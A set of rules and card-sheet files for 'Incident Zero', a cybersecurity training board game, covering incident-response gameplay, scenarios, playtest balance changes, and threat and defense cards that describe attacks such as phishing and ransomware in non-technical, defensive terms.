Focus: Sophisticated attack with multiple detection points; requires multiple defense/investigation attempts Expected Duration: 40 minutes Best For: Experienced players, demonstrating complex kill chain

Sample Defenses: - D-18: Intrusion Prevention System (IPS) (ADVANCED, 15) - D-09: Network Segmentation (ADVANCED, 15) - D-04: Network Firewall Rules (BASIC, 10) - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15) - D-13: Threat Hunting Program (ELITE, 25) - D-14: Memory Forensics (ELITE, 25)


Scenario 3: "Advanced Ransomware Supply Chain" (Advanced, 5 cards, 45 minutes)

Attack Chain: 1. T-13: Compromised Software Vendor Update (INITIAL COMPROMISE - MALWARE) 2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK) 3. T-05: Privilege Escalation via Kernel Exploit (PIVOT & ESCALATE - MALWARE) 4. T-09: Beaconing to C2 Server (C2 & EXFIL - NETWORK) 5. T-11: Ransomware Payload Deployment (C2 & EXFIL - MALWARE)

Starting Budget: 100 Turn Limit: 11 [(5 × 2) + 1]

Narrative Setup:

"A trusted software vendor released an update to your monitoring tools three weeks ago. Today, you're detecting ransomware-like activity across your infrastructure. You suspect the vendor update was compromised. Can you trace the attack chain before the ransomware wakes up?"

Focus: Complex supply-chain-initiated attack; requires pattern recognition; high pressure Expected Duration: 45 minutes Best For: Advanced players, demonstrating supply chain risk

Sample Defenses: - D-17: Advanced Malware Sandbox (ELITE, 25) — detonates vendor updates before deployment - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15) - D-09: Network Segmentation (ADVANCED, 15) - D-03: Windows Update Patching (BASIC, 10) — closes the kernel exploit - D-14: Memory Forensics (ELITE, 25) - D-19: Backup & Disaster Recovery (BASIC, 10) - D-11: Data Loss Prevention (ADVANCED, 15)


Extensions & Variations

Variation 1: Solo Play Mode

How to Play Solo: - Single player acts as both Blue Team AND Threat Orchestrator - Orchestrator creates attack chain before game starts - Orchestrator then "steps back" to investigate (hard mode: don't peek at hidden cards) - Requires discipline: don't use knowledge of chain to guide rolls

Best For: Individual learning, skill practice


Variation 2: Speed Mode

Compress the Game: - Reduce the turn limit by 2 (e.g., a 3-card chain plays in 5 turns instead of 7) - Optional: Remove Uncontained Threats penalty and Active Breach Cost (less bookkeeping) - Budget costs stay the same - Budget starts at 120 to balance speed pressure

Best For: Experienced teams wanting high-stakes challenge


Variation 3: Extended Investigation (Advanced)

Deeper Forensics: - Add "Advanced Investigate" action (costs 15 Budget, rolls 11+) - A successful Advanced Investigate counts as TWO accumulated investigation successes (i.e., it can reveal a link in one action if you already have a clue, v2.2) - Allows for riskier but more rewarding investigation strategy

Best For: Players who want forensic investigation to feel more rewarding


Variation 4: Competitive Tournament

Multiple Teams, Same Challenge: 1. All teams receive the same 4-card attack chain 2. All teams start with same 100 Budget, same 5 Defense Cards drawn 3. Teams play simultaneously (or in sequence) against same scenario 4. Scoring: Cards revealed + Budget remaining = final score 5. Tiebreaker: Fewest turns taken

Best For: Classroom competition, conference play, benchmarking


Next Steps After This Module

If You Won (Completed All Cards)

Option 1: Continue to Hardening Module - Excellent choice if building defenses against discovered threats - Use the attack chain you just discovered as the hardening context - Natural progression: detect the attack → now prevent it

Option 2: Continue to Audit & Compliance Module - Great for understanding how to detect this attack chain - Validates that your detection methods work - Audits your existing security controls

If You Lost (Time/Budget Expired)

Option 1: Continue to Disaster Recovery Module - Appropriate: assume the attack succeeded - Manage the breach that just happened - Focus on response, stakeholder communication, recovery

Option 2: Replay with Different Strategy - Try again with different investigation/defense approach - Use what you learned to optimize for next attempt

Option 3: Study Real Breach Case Studies - Compare your experience to real breaches (Equifax, Target, SolarWinds) - Understand why real dwell times are 200+ days - Learn what signals real defenders look for

Standalone Play

Play Again with: - Different attack chain from the card deck - Different difficulty (if you won easily or struggled) - Competitive mode against other teams - Extended variations with different mechanics


Quick Reference: Actions & Costs

Action Cost Roll Required Success Condition Failure Condition
Investigate 5 Budget roll + modifiers ≥ 11 1st success: clue; 2nd success on same link: card revealed (v2.2) No intel gained
Deploy Defense 10/15/25 roll + modifiers ≥ 11 Full match reveals card immediately Defense not deployed
Emergency Response 15 Budget (v2.2) None Threat removed, penalty stops

Quick Reference: Modifiers

Bonus When Awarded Examples
+2 Strong technical justification "Analyze mail headers in gateway logs to identify true sender IP, check against threat intelligence"
+1 Real security tools/techniques "Query SIEM for scheduled tasks", "Check Mimikatz in memory", "Review EDR telemetry"
+2 Deployed Defense Persistence (v2.2) A deployed defense's vector matches the targeted chain link
+0 Vague/no justification "Find suspicious activity"

Quick Reference: Trackers

Tracker Starts At Changes
Budget 100 -5 per Investigate, -10/15/25 per Defense, -15 per Emergency Response, -5 per uncontained threat at turn start, -5 Active Breach Cost at turn start while any chain card is unrevealed (v2.2); floor 0
Turn 1 +1 each turn (limit = chain × 2 + 1)
Uncontained Threats 0 +1 when card revealed, -1 when auto-mitigated or Emergency Response used

v2.2 Playtest Edition Changes

Changes for playtesters to validate, and why they were made:

  1. Investigation reveals (accumulating successes). The first successful Investigation of a chain link yields a clue; a second successful Investigation of that same link reveals the card. Deploy Defense full-match still reveals immediately. Previously only defense deployment could reveal cards, contradicting the overview text. Validate: does investigation-led play feel viable but slower than defense-led play?
  2. Deployed Defense Persistence. A deployed defense grants +2 to Investigate/Deploy rolls against any chain link matching its vector. Partial/no-match deployments now have lasting value.
  3. Active Breach Cost. −5 Budget at the start of each turn while at least one chain card is unrevealed. Fixes the inversion where hidden threats were free; teaches that dwell time costs money.
  4. Economy rebalance: Budget Grant reward reduced +15 → +10; Emergency Response repriced 25 → 15 Budget.
  5. Budget edge rules: Budget floors at 0; actions require full cost; victory is checked immediately on the final reveal (before start-of-turn penalties); defeat at 0 only if no legal action exists.
  6. Turn limits use the Variable Game Length formula (chain × 2) + 1 → 7/9/11 turns, replacing the fixed 12/10/10 table (see Core Rules §3a).
  7. Sequential discovery clarified: only the earliest unrevealed chain card can be revealed.
  8. Content fixes: sample-defense lists now cite real card IDs from the canonical 24-card deck (D-01–D-24); D-11 DLP correctly listed as ADVANCED/15.

Rough balance check (3-card beginner game, 7 turns): worst-case fixed costs are 5/turn Active Breach + 5/turn for one uncontained threat ≈ 60-70 Budget over a full game, leaving ~30-40 for actions before rewards; two Budget Grants (+20) and cheap Investigates (5) keep an investigation-led run solvent — see the worked example above, which ends at 5 Budget on turn 7.


Need Help?


Incident Response Module - Rules & Mechanics Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

docs/standalone-games/incident-response.md

Incident Response Module: Standalone Play Guide

Version: 2.2 - Playtest Edition Duration: 30-45 minutes Players: 1 Threat Orchestrator + 2-4 Blue Team members Best For: Incident response training, attack detection practice, SOC operations


Module Overview

The Incident Response Module teaches players how to detect and investigate cyberattacks under pressure. Players must reveal a hidden attack chain before time runs out or budget is exhausted.

This is the foundation module—many other modules build upon successful or unsuccessful incident response.


Setup (5 minutes)

1. Choose Difficulty Level

Turn limits use the Variable Game Length formula from Core Rules §3a: Turn Limit = (Attack Chain Cards × 2) + 1.

Difficulty Chain Length Budget Turn Limit Best For
Beginner 3 cards 100 7 turns First playthrough, basic learning
Intermediate 4 cards 100 9 turns Standard play, mixed experience
Advanced 5 cards 100 11 turns Experienced players, challenge

2. Threat Orchestrator Preparation

Create the Attack Chain: 1. Select 3-5 threat cards in logical sequence 2. Arrange by attack chain step: INITIAL COMPROMISE → PIVOT & ESCALATE → PERSISTENCE → C2 & EXFIL 3. Write down clues for each hidden card (don't reveal yet) 4. Place relevant Asset Cards on the table (visible to all). Asset Cards are shared components — see cards/network-building/core-deck/asset-cards.md

Recommended first-time scenario: - T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING) - T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK) - T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL) - Total: 3 cards, ~30 minutes, teaches full attack chain concept

3. Blue Team Setup

4. Read the Opening Scenario

Threat Orchestrator reads opening scenario based on only the first hidden card's clue. Example:

"Your security operations center is monitoring the network when alerts begin firing. Your SIEM shows suspicious email traffic coming from your IT department domain, but the headers look spoofed. Several employees have reported clicking links in emails they thought came from IT requesting password resets."


Gameplay Loop (25-35 minutes)

Round Structure

Each turn follows this structure:

1. START OF TURN - Uncontained Threats Penalty: For each revealed-but-uncontained threat, deduct 5 Budget - Active Breach Cost (v2.2): If at least one chain card is still unrevealed, deduct 5 Budget (dwell time is never free) - Read turn number aloud ("Turn 3...")

2. BLUE TEAM'S TURN (2-3 minutes discussion) - Team discusses strategy - Decides on ONE action (see below) - Announces action and parameters

3. ACTION RESOLUTION - Roll 1d20 for success/failure - Apply modifiers (see below) - Determine outcome

4. END OF TURN - Advance Turn Tracker by 1 - Draw 1 Defense Card - Check if game won/lost

Three Available Actions

Action 1: Investigate 🔎

Cost: 5 Budget Roll Required: 11+ (on d20)

How it works: 1. Team describes what they're investigating (e.g., "Email headers in the mail gateway logs") 2. Provide technical justification for the investigation approach 3. Roll 1d20

Roll Modifiers: - +2 bonus: Strong technical justification (references specific logs, tools, or methodologies) - +1 bonus: References real security tools/techniques (Splunk, Wireshark, EDR, specific CVEs, MITRE ATT&CK) - No modifier: Vague investigation (0 to +0)

Examples of good justification: - "We want to analyze the email headers in the mail gateway to identify the true sender IP and check it against threat intelligence feeds" - "We'll query our EDR agent logs for any processes spawned after the user clicked the link, looking for PowerShell or suspicious child processes"

Outcomes (v2.2 — investigation successes accumulate): - Success (roll + modifiers ≥ 11): - First success against the current chain link: TO gives a verbal clue about that hidden threat (always the earliest unrevealed card — see Sequential Discovery below) - Second success against the same link: THE CARD IS REVEALED! It becomes uncontained and the team chooses a Discovery Reward - Failure: "Your investigation yields no actionable intelligence" (turn wasted, budget spent, but team learned). Failures do not count toward the two successes.

Sequential Discovery (v2.2 note): Only the earliest unrevealed chain card can be revealed — by investigation or by defense deployment. Clues and successes always target that card, matching the clue system's walk down the kill chain.


Action 2: Deploy a Defense 🛡️

Cost: 10/15/25 Budget (depending on card tier) Roll Required: 11+ (on d20)

How it works: 1. Choose a Defense Card from your hand 2. Target a specific Asset or threat vector 3. Explain why this defense is appropriate for the situation 4. Roll 1d20

Roll Modifiers: Same as Investigate (+2 for justification, +1 for real tools)

Outcomes: - Success (roll + modifiers ≥ 11): - If card's Countermeasure matches the hidden threat's Attack Vector AND it's the correct step in the chain → THREAT CARD REVEALED IMMEDIATELY! - If it matches but wrong step, or right step but wrong vector → Defense deployed but no reveal - If neither matches → Defense deployed but ineffective against current threat

Deployed Defense Persistence (v2.2): Deployed defenses stay on the board. Whenever the chain link currently being targeted has a vector matching a deployed defense, add +2 to Investigate and Deploy Defense rolls against it (the TO, who knows the hidden vector, announces when this applies). Full rule in Module: Incident Response.


Action 3: Emergency Response 🚨

Cost: 15 Budget (v2.2 — repriced from 25) Roll Required: None—this always succeeds

How it works: 1. Choose a previously revealed Threat Card still in play 2. Describe your containment strategy (quarantine infected systems, disable compromised accounts, isolate network segments, etc.) 3. Card is immediately removed from play 4. Uncontained Threats penalty decreases by 1

Strategic Use: - Use this if you're running out of budget and accumulating penalties - Use this if a threat is too dangerous to leave active - Use this to prepare for later modules (e.g., if continuing to Hardening, fewer contained threats = more budget available)


Uncontained Threats Penalty & Active Breach Cost

How it works: 1. When a threat card is revealed, it becomes "uncontained" (add 1 to Uncontained Threats Tracker) 2. At the START of each turn, deduct 5 Budget per uncontained threat 3. Active Breach Cost (v2.2): at the START of each turn, also deduct 5 Budget if at least one chain card is still unrevealed (hidden dwell time costs money too) 4. When Emergency Response is used, remove that threat and decrement the tracker 5. When the next card in the chain is revealed, the previous uncontained threat is automatically "mitigated" (decrement tracker)

Example (one action per turn; 3-card chain; Budget 100):

Turn 1: START → -5 Active Breach Cost (95)
        Deploy Defense succeeds, full match → PHISHING REVEALED
        (-10 for the BASIC defense, 85) → Uncontained Threats = 1
        Reward: Budget Grant +10 (95)
Turn 2: START → -5 (uncontained) -5 (Active Breach: 2 cards hidden) = 85
        Emergency Response on Phishing: pay 15 (70) → Uncontained = 0
Turn 3: START → -5 (Active Breach only) = 65
        ...investigation continues toward the next chain card

Winning & Losing

Victory Condition ✓

Blue Team Wins if: - All threat cards in the attack chain are revealed - AND this happens within your turn limit (7/9/11 by chain length)

Victory is checked immediately when the final card is revealed (v2.2) — before any start-of-turn penalties.

Defeat Condition ✗

Blue Team Loses if: - Turn Tracker exceeds your turn limit with unrevealed cards remaining - OR the team cannot afford any legal action (Budget floors at 0; an action requires its full cost — see Budget Edge Rules in Module: Incident Response)

Scoring (Optional)

If you want to score:

Points = (Cards Revealed / Total Cards) × 50 + (Budget Remaining / 100) × 50

Example (4-card chain):
- 3 cards revealed: 37.5 points
- 35 budget remaining: 17.5 points
- Total: 55/100 (moderate performance)

Discovery Rewards

When your team successfully reveals a Threat Card:

Choose ONE reward:

  1. Intelligence Bonus: Draw 2 additional Defense Cards (keep both)
  2. Budget Grant: Gain +10 Budget (v2.2 — reduced from +15; represents management approval of your response)
  3. Fast-Track: On your next Investigate action, you succeed on 5+ instead of 11+ (still costs 5 Budget, still need justification modifiers)

Debrief & Reflection (5-10 minutes)

FOR WINNERS: 1. "What was your investigation strategy? What worked?" 2. "Which action type (Investigate vs. Deploy Defense) was most effective for you?" 3. "Did Uncontained Threats penalties force you to make reactive decisions? Was that realistic?"

FOR LOSERS: 1. "What went wrong in your investigation? Where did you get stuck?" 2. "Would you have benefited from more defense deployments vs. investigations?" 3. "How would you investigate differently if you could replay?"

EVERYONE: 1. "What was the attacker's complete kill chain?" 2. "Which threat card was hardest to detect? Why?" 3. "Why isn't this easy to detect in real-world networks?" 4. "What tool or process would have helped you detect faster?"


Tips for Threat Orchestrators

Creating Effective Clues

Poor clue (too vague): - "You find something suspicious"

Too good (gives it away): - "The attacker used Mimikatz to dump credentials from LSASS memory"

Just right (progressive disclosure): - "Your memory forensics shows suspicious LSASS process manipulation. A tool has dumped credential hashes from memory. Several cached domain admin credentials have been extracted."

Balancing Difficulty

The game is too easy if: - Teams reveal all cards in turns 1-4 with budget to spare - Clues are too specific - Teams succeed on every roll

The game is too hard if: - Teams get stuck after revealing 1 card - No successful rolls for 5+ turns - Teams hit the turn limit with only 1-2 cards revealed

Adjust by: - Number of cards (3 vs. 4 vs. 5 — the turn limit scales automatically via (chain × 2) + 1) - Quality of clues (more/less specific) - Starting budget (60 vs. 100 vs. 120) - Turn limit (formula −1 for harder, formula +1 for easier)

Running Multiple Teams

If running this for a tournament or competitive context: - Assign different attack chains to each team (or same chain for scoring comparison) - Teams cannot see each other's progress - First team to reveal all cards wins - Tiebreaker: Most Budget remaining


Sample Scenarios to Try

Scenario 1: "Startup Breach" (Beginner, 3 cards, 30 min)

  1. T-01: Phishing Campaign
  2. T-06: Mimikatz Credential Dumping
  3. T-10: SQL Database Exfiltration

Focus: Teaching full kill chain detection in 30 minutes

Scenario 2: "Nation-State Campaign" (Intermediate, 4 cards, 40 min)

  1. T-02: Watering Hole Attack
  2. T-04: Lateral Movement via SMB
  3. T-07: Scheduled Task Persistence
  4. T-09: Beaconing to C2 Server

Focus: Sophisticated attack with multiple detection points

Scenario 3: "Advanced Ransomware" (Advanced, 5 cards, 45 min)

  1. T-13: Compromised Software Vendor Update (expansion)
  2. T-04: Lateral Movement via SMB
  3. T-05: Privilege Escalation via Kernel Exploit
  4. T-09: Beaconing to C2 Server
  5. T-11: Ransomware Payload Deployment

Focus: Complex supply-chain-initiated attack chain


Extensions & Variations

Solo Play

Speed Mode

Cooperative vs. Competitive


Next Steps After This Module

If you won: - Continue to Hardening Module → Build defenses against discovered threats - Continue to Audit & Compliance Module → Verify your detection methods

If you lost: - Continue to Disaster Recovery Module → Manage the breach that succeeded - Replay with a different strategy - Try a different scenario

Standalone: Play again with a different attack chain


Quick Reference: Action Costs & Outcomes

Action Cost Roll Success Failure
Investigate 5 Budget roll + modifiers ≥ 11 1st success: clue; 2nd success on same link: reveal (v2.2) No intel (budget wasted)
Deploy Defense 10/15/25 roll + modifiers ≥ 11 Full match reveals card immediately Defense not deployed
Emergency Response 15 (v2.2) None Remove revealed threat
Modifier Effect
+2 Strong technical justification
+1 Real tool/technique referenced
+2 Deployed Defense Persistence: deployed defense's vector matches targeted link (v2.2)
Tracker Starting Changes
Budget 100 -5 per uncontained threat + -5 Active Breach Cost while any card is hidden (start of turn, v2.2); floor 0
Turn 1 +1 each turn (limit = chain × 2 + 1)
Uncontained Threats 0 +1 when revealed, -1 when contained or next card revealed

For the full list of v2.2 changes and reasoning, see the "v2.2 Playtest Edition Changes" section in Module: Incident Response.


Need Help?


Incident Response Module - Standalone Play Guide Part of Incident Zero, a modular cybersecurity board game

cards/incident-response/core-deck/threat-defense-cards.md

Incident Zero: Sample Card Sheets

Quick Reference


THREAT CARDS

Attack Chain Steps

Attack Vectors (Countermeasure Keywords)


SAMPLE THREAT CARD DECK (12 Cards)

INITIAL COMPROMISE THREATS

Card T-01: Phishing Campaign

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ PHISHING CAMPAIGN                   │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  SOCIAL ENGINEERING         │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your security team reports that    │
│ several employees have received     │
│ emails claiming to be from your     │
│ IT department requesting password   │
│ resets. One user has already        │
│ clicked the link. Email headers     │
│ show the domain is spoofed."        │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Phishing exploits human psychology  │
│ rather than technical vulnerabilities.│
│ Attackers use social engineering to │
│ create urgency and bypass technical │
│ controls. With email authentication │
│ (DMARC/SPF) and user training, this │
│ attack is highly preventable.       │
└─────────────────────────────────────┘

Card T-02: Watering Hole Attack

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ WATERING HOLE ATTACK                │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  WEB EXPLOIT                │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "A popular industry blog your       │
│ employees frequently visit has      │
│ been compromised. Logs show that    │
│ your users' browsers were           │
│ redirected to a malicious domain    │
│ hosting an exploit kit targeting    │
│ unpatched browsers."                │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Watering hole attacks target        │
│ trusted third-party sites to infect │
│ specific user groups. They bypass   │
│ email filters and exploit browser   │
│ vulnerabilities. Defense requires   │
│ rapid patching and endpoint         │
│ monitoring.                         │
└─────────────────────────────────────┘

Card T-03: Compromised Credentials

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ COMPROMISED CREDENTIALS             │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your SIEM has detected a           │
│ successful VPN login from an        │
│ unusual geographic location at      │
│ 3 AM. The username belongs to an    │
│ employee who is currently on        │
│ vacation. The login attempt came    │
│ from an IP in a known cybercrime    │
│ hosting provider."                  │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Credential stuffing uses passwords  │
│ leaked from third-party breaches.   │
│ If employees reuse passwords, their │
│ work accounts become compromised.   │
│ Multi-factor authentication (MFA)   │
│ is the primary defense.             │
└─────────────────────────────────────┘

PIVOT & ESCALATE THREATS

Card T-04: Lateral Movement via SMB

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ LATERAL MOVEMENT VIA SMB            │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  NETWORK                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Network segmentation alerts show   │
│ unusual SMB traffic between a       │
│ compromised workstation and your    │
│ file server. Suspicious named pipe  │
│ activity detected. The attacker     │
│ appears to be enumerating shares    │
│ and attempting to access restricted │
│ resources."                         │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ SMB (Server Message Block) is a     │
│ legitimate protocol, so traffic     │
│ blends in. Flat network architecture│
│ allows attackers to move freely.    │
│ Without micro-segmentation and      │
│ strong authentication, lateral      │
│ movement is easy.                   │
└─────────────────────────────────────┘

Card T-05: Privilege Escalation via Kernel Exploit

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ PRIVILEGE ESCALATION VIA KERNEL     │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "EDR telemetry shows a low-privilege│
│ process loading a proof-of-concept  │
│ exploit for an unpatched local      │
│ privilege escalation vulnerability  │
│ in the Windows kernel. Seconds      │
│ later, the same process spawned a   │
│ child running as SYSTEM. Patch      │
│ reports show this host is three     │
│ months behind on kernel updates."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Kernel exploits abuse memory-       │
│ corruption or logic flaws (think    │
│ Dirty Pipe or win32k CVEs) to jump  │
│ from a standard user to SYSTEM or   │
│ root. Public PoC code often appears │
│ within days of disclosure, so       │
│ unpatched hosts are easy targets.   │
│ Rapid patching, EDR behavioral      │
│ detection, and least privilege      │
│ limit the damage.                   │
└─────────────────────────────────────┘

Card T-06: Mimikatz Credential Dumping

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ MIMIKATZ CREDENTIAL DUMPING         │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Memory forensics analysis on the   │
│ Domain Controller reveals suspicious│
│ LSASS process manipulation. A tool  │
│ has dumped credential hashes from   │
│ memory. Several cached domain admin │
│ credentials have been extracted.    │
│ Attacker now has credentials to     │
│ move to critical systems."          │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Mimikatz attacks Windows LSASS      │
│ (Local Security Authority Subsystem)│
│ memory to extract credentials.      │
│ Without proper Credential Guard and │
│ memory protection, domain admin     │
│ credentials become compromised,     │
│ enabling full infrastructure access.│
└─────────────────────────────────────┘

PERSISTENCE THREATS

Card T-07: Scheduled Task Persistence

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ SCHEDULED TASK PERSISTENCE          │
├─────────────────────────────────────┤
│ Step:    PERSISTENCE                │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Log analysis shows a scheduled     │
│ task created by the compromised     │
│ account. The task is set to execute │
│ every 6 hours and runs a script     │
│ from a hidden directory. The        │
│ activity occurs outside normal      │
│ business hours. Timestamp metadata  │
│ indicates advanced timestomping."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Scheduled tasks run with privileges │
│ of the owner account and survive    │
│ reboots. They blend in with         │
│ legitimate administrative tasks.    │
│ Windows Event Logs may not be       │
│ forwarded centrally, allowing this  │
│ persistence mechanism to hide.      │
└─────────────────────────────────────┘

Card T-08: Registry Run Key Persistence

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ REGISTRY RUN KEY PERSISTENCE        │
├─────────────────────────────────────┤
│ Step:    PERSISTENCE                │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Registry analysis detects a new    │
│ entry under HKLM\Software\Microsoft\│
│ Windows\CurrentVersion\Run pointing │
│ to an executable in an unusual      │
│ location. The binary has            │
│ obfuscated metadata and a fake      │
│ digital signature. It executes at   │
│ every system startup."              │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Registry Run keys execute at startup│
│ with persistence across reboots.    │
│ They're difficult to distinguish    │
│ from legitimate startup programs.   │
│ Endpoint detection solutions must   │
│ actively monitor registry writes.   │
└─────────────────────────────────────┘

C2 & EXFIL THREATS

Card T-09: Beaconing to C2 Server

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ BEACONING TO C2 SERVER              │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  NETWORK                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your threat intelligence feed      │
│ alerts on suspicious outbound       │
│ HTTPS connections to a domain       │
│ associated with known malware.      │
│ Netflow shows regular 3-minute      │
│ intervals of encrypted traffic.     │
│ The pattern matches documented C2   │
│ beaconing behavior."                │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Beaconing establishes command and   │
│ control communication with the      │
│ attacker's infrastructure. Encrypted│
│ HTTPS makes payload inspection      │
│ difficult. Threat intelligence and  │
│ behavioral analysis (unusual timing)│
│ are required for detection.         │
└─────────────────────────────────────┘

Card T-10: SQL Database Exfiltration

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ SQL DATABASE EXFILTRATION           │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Database audit logs show a large   │
│ SELECT query executed by a service  │
│ account retrieving customer data.   │
│ Results (500k+ records) were piped  │
│ to a temporary file. System logs    │
│ show this file was copied to cloud  │
│ storage via encrypted connection."  │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Database exfiltration bypasses      │
│ endpoint controls. Attackers use    │
│ legitimate protocols (HTTPS, SFTP)  │
│ to trusted services (S3, Dropbox).  │
│ Without DLP (Data Loss Prevention),  │
│ and egress filtering, detection is  │
│ nearly impossible.                  │
└─────────────────────────────────────┘

Card T-11: Ransomware Payload Deployment

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ RANSOMWARE PAYLOAD DEPLOYMENT       │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "EDR alerts spike as multiple       │
│ processes begin encrypting files    │
│ on the file server. Hundreds of     │
│ files change extension to '.locked'.│
│ A ransom note appears on all        │
│ administrative workstations. Network│
│ traffic shows exfil before encryption│
│ began (double extortion tactic)."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Modern ransomware exfiltrates data  │
│ first (to extort payment), then     │
│ encrypts. Fast detection during the │
│ exfil phase is critical. Once file  │
│ encryption begins, recovery becomes │
│ difficult. Segmentation and backups │
│ are essential.                      │
└─────────────────────────────────────┘

Card T-12: Browser Extension Backdoor

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ BROWSER EXTENSION BACKDOOR          │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Browser logs show installation of  │
│ a suspicious extension claiming to  │
│ be a productivity tool. Traffic     │
│ analysis reveals the extension is   │
│ capturing keystrokes and session    │
│ cookies. User login credentials for │
│ sensitive portals are being sent to │
│ a server in a high-risk country."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Browser extensions run with full    │
│ access to user activity. They can   │
│ capture credentials, intercept      │
│ HTTPS traffic (before encryption),  │
│ and persist across browser updates. │
│ Extension vetting and endpoint      │
│ protection are critical defenses.   │
└─────────────────────────────────────┘

DEFENSE CARDS

Tier System

Countermeasure Vectors

Defense cards counter specific Attack Vectors: - SOCIAL ENGINEERING - WEB EXPLOIT - CREDENTIAL ABUSE - MALWARE - NETWORK - DATA EXFIL


SAMPLE DEFENSE CARD DECK (24 Cards)

Note (v2.2): This deck is identical to cards/hardening/core-deck/defense-cards.md (the two modules share one physical deck). Cards are grouped by tier; card IDs are stable and do not renumber when a card's tier changes, so IDs within a section are not always contiguous. D-18, D-19, D-23, and D-24 were retiered in v2.2, and D-24 is dual-tagged (counts as a match for either listed vector).

BASIC DEFENSES (10 Budget Each)

Card D-01: Email Authentication Setup

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ EMAIL AUTHENTICATION SETUP          │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: SOCIAL ENGINEERING  │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy SPF (Sender Policy           │
│ Framework), DKIM (DomainKeys        │
│ Identified Mail), and DMARC (Domain │
│ Message Authentication, Reporting & │
│ Conformance) to prevent email       │
│ spoofing. Implement enforcement     │
│ policies to reject spoofed emails.  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Blocks phishing emails claiming to  │
│ be from your domain. Requires       │
│ attackers to find alternative       │
│ vectors. Also provides reporting on │
│ spoofing attempts.                  │
└─────────────────────────────────────┘

Card D-02: User Security Training

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ USER SECURITY TRAINING              │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: SOCIAL ENGINEERING  │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Conduct phishing awareness training │
│ for all staff. Teach recognition of │
│ suspicious links, sender spoofing,  │
│ urgency tactics, and credential     │
│ harvesting attempts. Run simulated  │
│ phishing campaigns.                 │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Reduces successful phishing rate by │
│ 70-80%. Users become your first     │
│ line of defense. Works best when    │
